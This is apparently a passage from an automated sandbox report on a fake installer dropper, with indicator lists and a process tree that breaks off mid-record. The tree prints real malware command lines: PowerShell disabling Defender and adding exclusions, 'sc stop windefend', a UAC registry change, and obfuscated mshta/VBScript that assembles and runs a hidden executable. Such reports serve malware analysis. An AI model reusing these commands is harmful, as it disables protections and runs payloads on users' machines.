Hj5Pq1vV39n8G1DTpop2wdl2.exe Token: SeTakeOwnershipPrivilege 5020 Hj5Pq1vV39n8G1DTpop2wdl2.exe Token: SeLoadDriverPrivilege 5020 Hj5Pq1vV39n8G1DTpop2wdl2.exe Token: SeSystemProfilePrivilege 5020 Hj5Pq1vV39n8G1DTpop2wdl2.exe Token: SeSystemtimePrivilege 5020 Hj5Pq1vV39n8G1DTpop2wdl2.exe Token: SeProfSingleProcessPrivilege 5020 Hj5Pq1vV39n8G1DTpop2wdl2.exe Token: SeIncBasePriorityPrivilege 5020 Hj5Pq1vV39n8G1DTpop2wdl2.exe Token: SeCreatePagefilePrivilege 5020 Hj5Pq1vV39n8G1DTpop2wdl2.exe Token: SeCreatePermanentPrivilege 5020 Hj5Pq1vV39n8G1DTpop2wdl2.exe Token: SeBackupPrivilege 5020 Hj5Pq1vV39n8G1DTpop2wdl2.exe Token: SeRestorePrivilege 5020 Hj5Pq1vV39n8G1DTpop2wdl2.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
pid Process 5312 colorcpl.exe 7160 msedge.exe 33668 installer.exe 3232 Explorer.EXE 32860 Calculator.exe 49056 installer.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 29656 cmd.exe 31380 cmd.exe 8384 cmd.exe 9012 cmd.exe 17280 RuntimeBroker.exe 17280 RuntimeBroker.exe 49772 cmd.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 812 wrote to memory of 2172 812 setup_x86_x64_install.exe 83 PID 812 wrote to memory of 2172 812 setup_x86_x64_install.exe 83 PID 812 wrote to memory of 2172 812 setup_x86_x64_install.exe 83 PID 2172 wrote to memory of 5056 2172 setup_installer.exe 84 PID 2172 wrote to memory of 5056 2172 setup_installer.exe 84 PID 2172 wrote to memory of 5056 2172 setup_installer.exe 84 PID 1452 wrote to memory of 4880 1452 svchost.exe 88 PID 1452 wrote to memory of 4880 1452 svchost.exe 88 PID 5056 wrote to memory of 1592 5056 setup_install.exe 90 PID 5056 wrote to memory of 1592 5056 setup_install.exe 90 PID 5056 wrote to memory of 1592 5056 setup_install.exe 90 PID 5056 wrote to memory of 2912 5056 setup_install.exe 91 PID 5056 wrote to memory of 2912 5056 setup_install.exe 91 PID 5056 wrote to memory of 2912 5056 setup_install.exe 91 PID 1592 wrote to memory of 3096 1592 cmd.exe 92 PID 1592 wrote to memory of 3096 1592 cmd.exe 92 PID 1592 wrote to memory of 3096 1592 cmd.exe 92 PID 5056 wrote to memory of 3200 5056 setup_install.exe 93 PID 5056 wrote to memory of 3200 5056 setup_install.exe 93 PID 5056 wrote to memory of 3200 5056 setup_install.exe 93 PID 5056 wrote to memory of 3424 5056 setup_install.exe 94 PID 5056 wrote to memory of 3424 5056 setup_install.exe 94 PID 5056 wrote to memory of 3424 5056 setup_install.exe 94 PID 5056 wrote to memory of 3720 5056 setup_install.exe 95 PID 5056 wrote to memory of 3720 5056 setup_install.exe 95 PID 5056 wrote to memory of 3720 5056 setup_install.exe 95 PID 2912 wrote to memory of 3992 2912 cmd.exe 96 PID 2912 wrote to memory of 3992 2912 cmd.exe 96 PID 2912 wrote to memory of 3992 2912 cmd.exe 96 PID 5056 wrote to memory of 4120 5056 setup_install.exe 118 PID 5056 wrote to memory of 4120 5056 setup_install.exe 118 PID 5056 wrote to memory of 4120 5056 setup_install.exe 118 PID 5056 wrote to memory of 2992 5056 setup_install.exe 117 PID 5056 wrote to memory of 2992 5056 setup_install.exe 117 PID 5056 wrote to memory of 2992 5056 setup_install.exe 117 PID 5056 wrote to memory of 924 5056 setup_install.exe 115 PID 5056 wrote to memory of 924 5056 setup_install.exe 115 PID 5056 wrote to memory of 924 5056 setup_install.exe 115 PID 5056 wrote to memory of 3904 5056 setup_install.exe 97 PID 5056 wrote to memory of 3904 5056 setup_install.exe 97 PID 5056 wrote to memory of 3904 5056 setup_install.exe 97 PID 5056 wrote to memory of 1908 5056 setup_install.exe 98 PID 5056 wrote to memory of 1908 5056 setup_install.exe 98 PID 5056 wrote to memory of 1908 5056 setup_install.exe 98 PID 5056 wrote to memory of 2916 5056 setup_install.exe 114 PID 5056 wrote to memory of 2916 5056 setup_install.exe 114 PID 5056 wrote to memory of 2916 5056 setup_install.exe 114 PID 3200 wrote to memory of 4064 3200 cmd.exe 99 PID 3200 wrote to memory of 4064 3200 cmd.exe 99 PID 3200 wrote to memory of 4064 3200 cmd.exe 99 PID 5056 wrote to memory of 808 5056 setup_install.exe 113 PID 5056 wrote to memory of 808 5056 setup_install.exe 113 PID 5056 wrote to memory of 808 5056 setup_install.exe 113 PID 5056 wrote to memory of 1512 5056 setup_install.exe 100 PID 5056 wrote to memory of 1512 5056 setup_install.exe 100 PID 5056 wrote to memory of 1512 5056 setup_install.exe 100 PID 5056 wrote to memory of 4108 5056 setup_install.exe 112 PID 5056 wrote to memory of 4108 5056 setup_install.exe 112 PID 5056 wrote to memory of 4108 5056 setup_install.exe 112 PID 3720 wrote to memory of 4088 3720 cmd.exe 111 PID 3720 wrote to memory of 4088 3720 cmd.exe 111 PID 3720 wrote to memory of 4088 3720 cmd.exe 111 PID 3424 wrote to memory of 3324 3424 cmd.exe 101 PID 3424 wrote to memory of 3324 3424 cmd.exe 101 -
System policy modification 1 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 46puvSQnm9v3JLD7WOWMRWFL.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 8CD8CA21.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3232 -
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:812 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\setup_install.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:5056 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious use of WriteProcessMemory
PID:1592 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3096
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious use of WriteProcessMemory
PID:2912 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3992
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03d477f1a31.exe5⤵
- Suspicious use of WriteProcessMemory
PID:3200 -
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun03d477f1a31.exeSun03d477f1a31.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4064 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4064 -s 20407⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5908
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun033e271e0ce96c08.exe /mixone5⤵
- Suspicious use of WriteProcessMemory
PID:3424 -
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun033e271e0ce96c08.exeSun033e271e0ce96c08.exe /mixone6⤵
- Executes dropped EXE
PID:3324 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3324 -s 2407⤵
- Program crash
PID:5716
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun039750b00c.exe5⤵
- Suspicious use of WriteProcessMemory
PID:3720 -
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun039750b00c.exeSun039750b00c.exe6⤵
- Executes dropped EXE
PID:4088 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCRipt: CLoSE( createOBJeCT ( "wsCript.ShelL").rUn("cMD.exE /R tyPe ""C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun039750b00c.exe"" > wXE1XgqZIR_W9IM.exE && start WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI & if """" == """" for %m in ( ""C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun039750b00c.exe"") do taskkill -Im ""%~Nxm"" /F " , 0 , TrUe ))7⤵PID:2008
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tyPe "C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun039750b00c.exe" > wXE1XgqZIR_W9IM.exE && start WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI &if "" == "" for %m in ( "C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun039750b00c.exe") do taskkill -Im "%~Nxm" /F8⤵PID:5124
-
C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exEWXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI9⤵
- Executes dropped EXE
PID:5384 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCRipt: CLoSE( createOBJeCT ( "wsCript.ShelL").rUn("cMD.exE /R tyPe ""C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE"" > wXE1XgqZIR_W9IM.exE && start WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI & if ""-PRt0qXDI7zI "" == """" for %m in ( ""C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE"") do taskkill -Im ""%~Nxm"" /F " , 0 , TrUe ))10⤵PID:5516
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tyPe "C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE" > wXE1XgqZIR_W9IM.exE && start WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI &if "-PRt0qXDI7zI " == "" for %m in ( "C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE") do taskkill -Im "%~Nxm" /F11⤵PID:5860
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCripT: CLOse(CReAteoBjECt ( "wScrIPT.SHeLL"). RuN ( "CmD /C EcHo | sEt /P = ""MZ"" > QKYLkI3.T & CopY /Y /b QKYLkI3.T +KXCn0WxW.e+ 8QfI1D5v.X + 52TbWL.SZV + Y4JTKX.X9 +88N4.I +xU3XyT.P UKHPFGIw.UMV & START msiexec.exe -Y .\UKHPfGIw.UMV " , 0, TRUe ))10⤵PID:5156
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C EcHo | sEt /P = "MZ" > QKYLkI3.T& CopY /Y /b QKYLkI3.T +KXCn0WxW.e+ 8QfI1D5v.X+52TbWL.SZV +Y4JTKX.X9 +88N4.I +xU3XyT.P UKHPFGIw.UMV& START msiexec.exe -Y .\UKHPfGIw.UMV11⤵PID:4088
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>QKYLkI3.T"12⤵PID:5500
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "12⤵PID:3852
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -Y .\UKHPfGIw.UMV12⤵
- Loads dropped DLL
PID:3924
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -Im "Sun039750b00c.exe" /F9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5600
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0324aba28588c0.exe5⤵PID:3904
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun0324aba28588c0.exeSun0324aba28588c0.exe6⤵
- Executes dropped EXE
PID:3612 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 2407⤵
- Program crash
PID:2848
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun038aa349e3318e.exe5⤵PID:1908
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun038aa349e3318e.exeSun038aa349e3318e.exe6⤵
- Executes dropped EXE
PID:2900 -
C:\Users\Admin\Pictures\Adobe Films\tv3K6hSK60TEWOTPIZxPD0z1.exe"C:\Users\Admin\Pictures\Adobe Films\tv3K6hSK60TEWOTPIZxPD0z1.exe"7⤵
- Executes dropped EXE
PID:5772
-
-
C:\Users\Admin\Pictures\Adobe Films\hgmCgKLLp6_aBM_p6OXdxhM4.exe"C:\Users\Admin\Pictures\Adobe Films\hgmCgKLLp6_aBM_p6OXdxhM4.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4708 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4708 -s 1528⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5912
-
-
-
C:\Users\Admin\Pictures\Adobe Films\nuv3nTIlFEYBrkPp1N3C1htI.exe"C:\Users\Admin\Pictures\Adobe Films\nuv3nTIlFEYBrkPp1N3C1htI.exe"7⤵
- Executes dropped EXE
PID:3392 -
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"8⤵PID:5368
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\build.exe" & del C:\ProgramData\*.dll & exit9⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6112 -
C:\Windows\SysWOW64\taskkill.exetaskkill /im build.exe /f10⤵
- Kills process with taskkill
PID:5412
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 610⤵
- Delays execution with timeout.exe
PID:7288
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\dyEvj3hC2t7OMuwoWXdKUmK3.exe"C:\Users\Admin\Pictures\Adobe Films\dyEvj3hC2t7OMuwoWXdKUmK3.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:4716
-
-
C:\Users\Admin\Pictures\Adobe Films\024wC3SO_qVtbE4Y9Lz5RQz9.exe"C:\Users\Admin\Pictures\Adobe Films\024wC3SO_qVtbE4Y9Lz5RQz9.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5612 -
C:\Users\Admin\Pictures\Adobe Films\024wC3SO_qVtbE4Y9Lz5RQz9.exe"C:\Users\Admin\Pictures\Adobe Films\024wC3SO_qVtbE4Y9Lz5RQz9.exe"8⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5328
-
-
-
C:\Users\Admin\Pictures\Adobe Films\46puvSQnm9v3JLD7WOWMRWFL.exe"C:\Users\Admin\Pictures\Adobe Films\46puvSQnm9v3JLD7WOWMRWFL.exe"7⤵
- Executes dropped EXE
- Drops startup file
- Windows security modification
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- System policy modification
PID:5808 -
C:\Users\Admin\AppData\Local\Temp\5761cbdb-fc5c-47f0-a896-c7edc400f9a5\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\5761cbdb-fc5c-47f0-a896-c7edc400f9a5\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\5761cbdb-fc5c-47f0-a896-c7edc400f9a5\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run8⤵
- Executes dropped EXE
PID:5528 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\5761cbdb-fc5c-47f0-a896-c7edc400f9a5\test.bat"9⤵PID:6656
-
-
-
C:\Users\Admin\AppData\Local\Temp\d30d5ea6-3d98-4d92-920e-4a454e98413a\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\d30d5ea6-3d98-4d92-920e-4a454e98413a\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\d30d5ea6-3d98-4d92-920e-4a454e98413a\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run8⤵PID:3792
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\d30d5ea6-3d98-4d92-920e-4a454e98413a\test.bat"9⤵PID:6724
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\46puvSQnm9v3JLD7WOWMRWFL.exe" -Force8⤵PID:5956
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\46puvSQnm9v3JLD7WOWMRWFL.exe" -Force8⤵PID:4964
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\46puvSQnm9v3JLD7WOWMRWFL.exe" -Force8⤵PID:3140
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe" -Force8⤵PID:1144
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe" -Force8⤵PID:5724
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\46puvSQnm9v3JLD7WOWMRWFL.exe" -Force8⤵PID:5828
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe"8⤵
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- System policy modification
PID:1040 -
C:\Users\Admin\AppData\Local\Temp\6cb215d3-6359-479f-9641-70b0faee0ee0\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\6cb215d3-6359-479f-9641-70b0faee0ee0\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\6cb215d3-6359-479f-9641-70b0faee0ee0\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run9⤵PID:7632
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\6cb215d3-6359-479f-9641-70b0faee0ee0\test.bat"10⤵PID:6744
-
-
-
C:\Users\Admin\AppData\Local\Temp\0249fd11-b809-48cc-bf7c-28ee4e94f895\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\0249fd11-b809-48cc-bf7c-28ee4e94f895\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\0249fd11-b809-48cc-bf7c-28ee4e94f895\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run9⤵PID:3436
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\0249fd11-b809-48cc-bf7c-28ee4e94f895\test.bat"10⤵PID:7092
-
C:\Windows\system32\sc.exesc stop windefend11⤵PID:988
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe" -Force9⤵PID:2804
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe" -Force9⤵PID:5512
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe" -Force9⤵PID:1448
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\03B82AA2\svchost.exe" -Force9⤵PID:4056
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe" -Force9⤵PID:8176
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8176 -s 89210⤵
- Program crash
PID:5464
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8176 -s 89210⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3004
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\03B82AA2\svchost.exe" -Force9⤵PID:2248
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe"9⤵PID:3992
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\03B82AA2\svchost.exe" -Force8⤵PID:6368
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\46puvSQnm9v3JLD7WOWMRWFL.exe" -Force8⤵PID:7736
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\03B82AA2\svchost.exe" -Force8⤵PID:7504
-
-
C:\Users\Admin\Pictures\Adobe Films\46puvSQnm9v3JLD7WOWMRWFL.exe"C:\Users\Admin\Pictures\Adobe Films\46puvSQnm9v3JLD7WOWMRWFL.exe"8⤵PID:5700
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ZP0MR34BkzoGGsDYhHusS489.exe"C:\Users\Admin\Pictures\Adobe Films\ZP0MR34BkzoGGsDYhHusS489.exe"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5724 -
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"8⤵
- Executes dropped EXE
PID:3224
-
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"8⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:1232
-
-
-
C:\Users\Admin\Pictures\Adobe Films\F37OFtk5v9UdORoY8t4Donzo.exe"C:\Users\Admin\Pictures\Adobe Films\F37OFtk5v9UdORoY8t4Donzo.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5920
-
-
C:\Users\Admin\Pictures\Adobe Films\9Zb2WtRSw11ACQNzk2XLqI6n.exe"C:\Users\Admin\Pictures\Adobe Films\9Zb2WtRSw11ACQNzk2XLqI6n.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5848
-
-
C:\Users\Admin\Pictures\Adobe Films\VaQQKPf9T577ZPDm1uawzRQO.exe"C:\Users\Admin\Pictures\Adobe Films\VaQQKPf9T577ZPDm1uawzRQO.exe"7⤵
- Executes dropped EXE
PID:1560 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1560 -s 2808⤵
- Program crash
PID:5624
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Zx0htBgAf3gZhfn9rCPnpedY.exe"C:\Users\Admin\Pictures\Adobe Films\Zx0htBgAf3gZhfn9rCPnpedY.exe"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5472 -
C:\Users\Admin\Documents\ZYQIPC2bbMYZliSoqUrEJ6Y4.exe"C:\Users\Admin\Documents\ZYQIPC2bbMYZliSoqUrEJ6Y4.exe"8⤵PID:6612
-
C:\Users\Admin\Pictures\Adobe Films\bWw9uRskntfP17tKU1kXBdT2.exe"C:\Users\Admin\Pictures\Adobe Films\bWw9uRskntfP17tKU1kXBdT2.exe"9⤵PID:5372
-
-
C:\Users\Admin\Pictures\Adobe Films\hhdys4K7UWyFNobqt4GlqiEh.exe"C:\Users\Admin\Pictures\Adobe Films\hhdys4K7UWyFNobqt4GlqiEh.exe"9⤵PID:7636
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7636 -s 27610⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:908
-
-
-
C:\Users\Admin\Pictures\Adobe Films\RUc12BIkVlXMFW5crVQpYnzm.exe"C:\Users\Admin\Pictures\Adobe Films\RUc12BIkVlXMFW5crVQpYnzm.exe"9⤵PID:7744
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7744 -s 23610⤵
- Program crash
- Checks processor information in registry
PID:6844
-
-
-
